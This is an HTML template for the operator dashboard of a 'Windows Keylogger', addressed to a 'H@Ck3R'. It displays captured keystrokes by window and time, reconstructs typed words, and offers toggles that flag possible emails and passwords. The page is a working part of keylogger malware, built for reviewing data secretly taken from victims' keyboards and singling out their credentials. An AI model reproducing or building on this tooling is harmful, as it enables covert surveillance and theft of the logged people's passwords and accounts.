<!DOCTYPE html>
<html>
    <head>
        <!-- Required meta tags -->
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

        
        <title>{% block title %}{% endblock %} Windows Keylogger</title>
        <!-- <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script> -->

        <!-- Bootstrap CSS -->
        <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/css/bootstrap.min.css" integrity="sha384-TX8t27EcRE3e/ihU7zmQxVncDAy5uIKz4rEkgIXeMed4M0jlfIDPvg6uqKI2xXr2" crossorigin="anonymous">

        <!-- jquery -->
        <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.0/jquery.min.js"></script>

        <!-- Datatables -->
        <link rel="stylesheet" type="text/css" href="https://cdn.datatables.net/1.10.24/css/jquery.dataTables.css">
        <script type="text/javascript" charset="utf8" src="https://cdn.datatables.net/1.10.24/js/jquery.dataTables.js"></script>

        <!-- Toggle button -->
        <link href="https://cdn.jsdelivr.net/gh/gitbrent/bootstrap4-toggle@3.6.1/css/bootstrap4-toggle.min.css" rel="stylesheet">
        <script src="https://cdn.jsdelivr.net/gh/gitbrent/bootstrap4-toggle@3.6.1/js/bootstrap4-toggle.min.js"></script>
        <!-- Main js -->
        <script src="./static/main.js"></script>
        
        <!-- To get rid of favicon.ico errors -->
        <link rel="icon" href="data:,">

    </head>
  <body>
    <header>
      <h1>Hello H@Ck3R!</h1>
      <nav>
        <b>Keypresses</b>
        <ul>
          <li><a href="#keyAll">View all key events</li></a>
          <li><a href="#wordAll">View words typed</li></a>
        </ul>
      </nav>
    </header>
    <!-- {% block content %}{% endblock %} -->
    <div class="container">
      <!-- View all keypresses -->
      <div id="keyAll" class="table-responsive">
          <h2>View all key events</h2>
          <div class="alert alert-success" id="showKeyTable" style="visibility: hidden"></div>
          
          <label class="checkbox">
            <input id="keydownToggle" type="checkbox" data-toggle="toggle"> Show keydown only
          </label>
          <br/>
          <label class="checkbox">
            <input id="noneToggle" checked type="checkbox" data-toggle="toggle"> Remove 'None' values
          </label>
          <table id="tableKeypresses" class="table table-striped table-bordered">
              <thead>
                  <tr>
                      <th>datetime</th>
                      <th>isKeyDown</th>
                      <th>windowName</th>
                      <th>processedKey</th>
                  </tr>
              </thead>
              <tbody>
              </tbody>
          </table>
      </div>
      
      <!-- View words typed -->
      <div id="wordAll">
        <h2>View all words pressed</h2>
        <div class="alert alert-success" id="showWordTable" style="visibility: hidden"></div>

        <label class="checkbox">
          <input id="emailToggle" type="checkbox" data-toggle="toggle"> Show possible emails
        </label>
        <br/>
        <label class="checkbox">
          <input id="passwordToggle" type="checkbox" data-toggle="toggle"> Show possible passwords
        </label>
        <table id="tableWords" class="table table-striped table-bordered">
            <thead>
                <tr>
                    <th>datetime</th>
                    <th>windowName</th>
                    <th>processedWord</th>
                    <th>isEmail</th>
                    <th>isPassword</th>
                </tr>
            </thead>
            <tbody>
            </tbody>
        </table>
    </div>
    
  </body>
</html>